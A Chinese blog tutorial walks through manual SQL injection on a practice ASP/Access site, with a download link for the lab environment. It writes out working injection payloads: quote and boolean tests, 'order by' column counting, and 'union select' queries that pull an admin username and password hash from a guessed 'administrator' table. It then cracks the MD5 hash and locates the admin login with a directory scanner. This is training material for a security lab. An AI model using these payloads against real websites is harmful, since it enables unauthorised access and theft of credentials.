Access手工注入靶场(附环境搭建教程)

环境搭建资源:

百度网盘链接: https://pan.baidu.com/s/1I_ba8kB280LZB0eEilNHJA 提取码: kcr2

1.将环境附件的压缩包解压到网站根目录(wwwroot)下  

2.访问IIS服务器绑定的IP地址 即可访问到靶场

3.点开新闻页面 发现url地址有id参数 

4.尝试进行注入 判断注入点

在url后加引号 发现页面报错 说明存在注入点

在后面进行逻辑判断 and 1=1 发现页面正常

/news_view.asp?id=10 and 1=2 跟错误的逻辑判断时 页面报错

5.判断有几个字段

news_view.asp?id=10 order by 7  当字段为7时 页面显示正常 

news_view.asp?id=10 order by 8  当字段为8时 页面报错 说明只有7个字段

6.尝试寻找回显点

注意:access与MySQL的查询语法不同

access的查询语法是select * from 表名

表名只能靠字节猜测 常见的表名或字段名:admin、users、username、user_name admin_user、administrator

尝试表名为users 页面报错 说明不存在users表

news_view.asp?id=10 union select 1,2,3,4,5,6,7 from users

尝试表名为administrator时 页面正常 出现回显点

news_view.asp?id=10 union select 1,2,3,4,5,6,7 from administrator

7.尝试查询后台登录用户的用户名和密码

表的字段名只能靠猜

在回显点的位置查询我们要查询的语句 

news_view.asp?id=10 union select 1,user_name,3,4,5,6,7 from administrator

尝试用户名的字段=user_name时 页面显示正常 返回了用户名为admin

尝试密码的字段为password时 页面正常显示 并返回了一串加密后的密码

/news_view.asp?id=10 union select 1,user_name,password,4,5,6,7 from administrator

8.使用在线网站解密加密后的MD5密码

在线解密网站:md5在线解密破解,md5解密加密

解密后的密码为admin

9.查找网站的后台登录地址 并登录后台

使用御剑进行目录扫描 可以看到有一个index.asp

在网站访问index.asp

http://172.16.1.137/admin/index.asp

可以看到是后台登录管理系统

用户名 admin        密码 admin 可以登录成功

到此 注入完成!

  • 15
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值